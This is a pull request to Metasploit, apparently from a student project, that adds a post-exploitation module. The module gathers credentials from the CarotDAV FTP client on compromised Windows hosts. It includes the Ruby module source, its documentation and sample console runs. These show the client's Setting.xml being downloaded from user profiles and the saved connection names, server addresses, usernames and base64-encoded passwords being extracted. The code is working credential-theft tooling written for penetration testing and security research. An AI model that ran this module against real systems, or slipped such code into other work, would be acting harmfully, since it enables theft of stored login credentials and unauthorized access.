### PR TITLE
Add CarotDAV FTP PackRat module

### DIFF
--- a/documentation/modules/post/windows/gather/credentials/carotdav_ftp.md
+++ b/documentation/modules/post/windows/gather/credentials/carotdav_ftp.md
@@ -35,7 +35,7 @@ This option is turned on by default and will perform the data extraction using t
 regular expression. The 'Store loot' options must be turned on in order for this to take work.
 
 ## Scenarios
-### Default Output
+### CarotDAV FTP v1.16.3 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Default Output
 ```
 msf6 post(windows/gather/credentials/carotdav_ftp) > run
 
@@ -63,7 +63,7 @@ msf6 post(windows/gather/credentials/carotdav_ftp) > run
 
 ```
 
-### Verbose Output
+### CarotDAV FTP v1.16.3 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Verbose Output
 ```
 msf6 post(windows/gather/credentials/carotdav_ftp) > run
 

--- a/documentation/modules/post/windows/gather/credentials/carotdav_ftp.md
+++ b/documentation/modules/post/windows/gather/credentials/carotdav_ftp.md
@@ -1,12 +1,12 @@
 ## Vulnerable Application
 
-  This post-exploitation module extracts clear text credentials from the CarotDAV ftp Client.
+This post-exploitation module extracts clear text credentials from the CarotDAV ftp Client.
 
-  The CarotDAV FTP Client is avaialble from (https://rei.to/carotdav_en.html).
+The CarotDAV FTP Client is avaialble from (https://rei.to/carotdav_en.html).
 
-  This module extracts information from the Setting file in the "AppData\Roaming\Rei Software\CarotDAV" directory.
+This module extracts information from the Setting file in the "AppData\Roaming\Rei Software\CarotDAV" directory.
 
-  This module extracts server information such as connection name, target URI, username and password.
+This module extracts server information such as connection name, target URI, username and password.
 
 
 ## Verification Steps

--- a/documentation/modules/post/windows/gather/credentials/carotdav_ftp.md
+++ b/documentation/modules/post/windows/gather/credentials/carotdav_ftp.md
@@ -1,0 +1,107 @@
+## Vulnerable Application
+
+  This post-exploitation module extracts clear text credentials from the CarotDAV ftp Client.
+
+  The CarotDAV FTP Client is avaialble from (https://rei.to/carotdav_en.html).
+
+  This module extracts information from the Setting file in the "AppData\Roaming\Rei Software\CarotDAV" directory.
+
+  This module extracts server information such as connection name, target URI, username and password.
+
+
+## Verification Steps
+
+1. Start MSF console
+2. Get a Meterpreter session on a Windows system
+3. use post/windows/gather/credentials/carotdav_ftp
+4. Set SESSION 1
+5. enter 'run' to extract credentials from all applications
+
+
+## Options
+### VERBOSE
+
+By default verbose is turned off. When turned on, the module will show information on files
+which aren't extracted and information that is not directly related to the artifact output.
+
+
+### STORE_LOOT
+This option is turned on by default and saves the stolen artifacts/files on the local machine,
+this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries.
+
+
+### EXTRACT_DATA
+This option is turned on by default and will perform the data extraction using the predefined
+regular expression. The 'Store loot' options must be turned on in order for this to take work.
+
+## Scenarios
+### Default Output
+```
+msf6 post(windows/gather/credentials/carotdav_ftp) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Carotdav's Setting file found
+[*] Downloading C:\Users\test\AppData\Roaming\Rei Software\CarotDAV\Setting.xml
+[*] Carotdav Setting.xml downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508103946_default_10.0.0.2_CarotDAVSetting._341142.xml
+
+[+] <Name>TheTestBed</Name>
+[+] <Name>Aperture Testing Laboratories</Name>
+[+] <TargetUri>ftp://10.0.0.2/</TargetUri>
+[+] <TargetUri>ftp://10.0.0.3/</TargetUri>
+[+] <UserName>TestBed\TheTester</UserName>
+[+] <UserName>TestBed\TheBackupTester</UserName>
+[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
+[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
+[+] File with data saved:  /home/kali/.msf4/loot/20240508103947_default_10.0.0.2_EXTRACTIONSSetti_673514.xml
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```
+
+### Verbose Output
+```
+msf6 post(windows/gather/credentials/carotdav_ftp) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Starting Packrat...
+[-] Carotdav's base folder not found in users's user directory
+
+[*] Starting Packrat...
+[*] Carotdav's base folder found
+[*] Found the folder containing specified artifact for Setting.
+[*] Carotdav's Setting file found
+[*] Processing C:\Users\test\AppData\Roaming\Rei Software\CarotDAV
+[*] Downloading C:\Users\test\AppData\Roaming\Rei Software\CarotDAV\Setting.xml
+[*] Carotdav Setting.xml downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508103903_default_10.0.0.2_CarotDAVSetting._292914.xml
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <Name>TheTestBed</Name>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <Name>Aperture Testing Laboratories</Name>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <TargetUri>ftp://10.0.0.2/</TargetUri>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <TargetUri>ftp://10.0.0.3/</TargetUri>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <UserName>TestBed\TheTester</UserName>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <UserName>TestBed\TheBackupTester</UserName>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
+[+] File with data saved:  /home/kali/.msf4/loot/20240508103903_default_10.0.0.2_EXTRACTIONSSetti_754664.xml
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```

--- a/modules/post/windows/gather/credentials/carotdav_ftp.rb
+++ b/modules/post/windows/gather/credentials/carotdav_ftp.rb
@@ -70,11 +70,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [
-          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|
-                                                          k[:filetypes]
-                                                        end.uniq.unshift('All')
-        ])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
       ]
     )
   end

--- a/modules/post/windows/gather/credentials/carotdav_ftp.rb
+++ b/modules/post/windows/gather/credentials/carotdav_ftp.rb
@@ -1,0 +1,95 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  # this associative array defines the artifacts known to PackRat
+  include Msf::Post::File
+  include Msf::Post::Windows::UserProfiles
+  include Msf::Post::Windows::Packrat
+  ARTIFACTS =
+    {
+      application: 'CarotDAV',
+      app_category: 'FTP',
+      gatherable_artifacts: [
+        {
+          filetypes: 'logins',
+          path: 'AppData',
+          dir: 'Rei Software',
+          artifact_file_name: 'Setting',
+          description: 'Saved Bookmarks',
+          credential_type: 'xml',
+          xml_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              xml: [
+                '//Name',
+                '//TargetUri',
+                '//UserName',
+                '//Password'
+              ]
+            }
+          ]
+        }
+      ]
+    }.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'CarotDAV credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for credentials stored on CarotDAV FTP Client in a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Jacob Tierney',
+          'Kazuyoshi Maruta',
+          'Daniel Hallsworth',
+          'Barwar Salim M',
+          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
+        ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
+        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
+        # enumerates the options based on the artifacts that are defined below
+        OptEnum.new('ARTIFACTS', [
+          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|
+                                                          k[:filetypes]
+                                                        end.uniq.unshift('All')
+        ])
+      ]
+    )
+  end
+
+  def run
+    print_status('Filtering based on these selections:  ')
+    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
+    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
+    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")
+
+    # used to grab files for each user on the remote host
+    grab_user_profiles.each do |userprofile|
+      run_packrat(userprofile, ARTIFACTS)
+    end
+
+    print_status 'PackRat credential sweep Completed'
+  end
+end


### PR DESCRIPTION
As A part of my final year project at Leeds Beckett University, I have developed several post-exploitation modules utilising the existing PackRat framework built by former LBU students. This PR will add a new `/post/windows/gather/credentials` module for the CarotDAV FTP Client. [https://rei.to/carotdav_en.html](url)

Currently, passwords extracted by the module are still encoded with base64. 

This pull request will add two files:
1. modules/post/windows/gather/credentials/carotdav_ftp.rb
2. documentation/modules/post/windows/gather/credentials/carotdav_ftp.md


## Verification

1. Start `msfconsole`
2.  Get a Meterpreter session on a Windows system
3. `use post/windows/gather/credentials/carotdav_ftp`
4. `Set SESSION 1`
5. `run`

## Scenario
Using CarotDAV FTP v1.16.3 running on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045
```
msf6 post(windows/gather/credentials/carotdav_ftp) > run

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Carotdav's Setting file found
[*] Downloading C:\Users\test\AppData\Roaming\Rei Software\CarotDAV\Setting.xml
[*] Carotdav Setting.xml downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508103946_default_10.0.0.2_CarotDAVSetting._341142.xml

[+] <Name>TheTestBed</Name>
[+] <Name>Aperture Testing Laboratories</Name>
[+] <TargetUri>ftp://10.0.0.2/</TargetUri>
[+] <TargetUri>ftp://10.0.0.3/</TargetUri>
[+] <UserName>TestBed\TheTester</UserName>
[+] <UserName>TestBed\TheBackupTester</UserName>
[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
[+] File with data saved:  /home/kali/.msf4/loot/20240508103947_default_10.0.0.2_EXTRACTIONSSetti_673514.xml
[*] PackRat credential sweep Completed
[*] Post module execution completed

```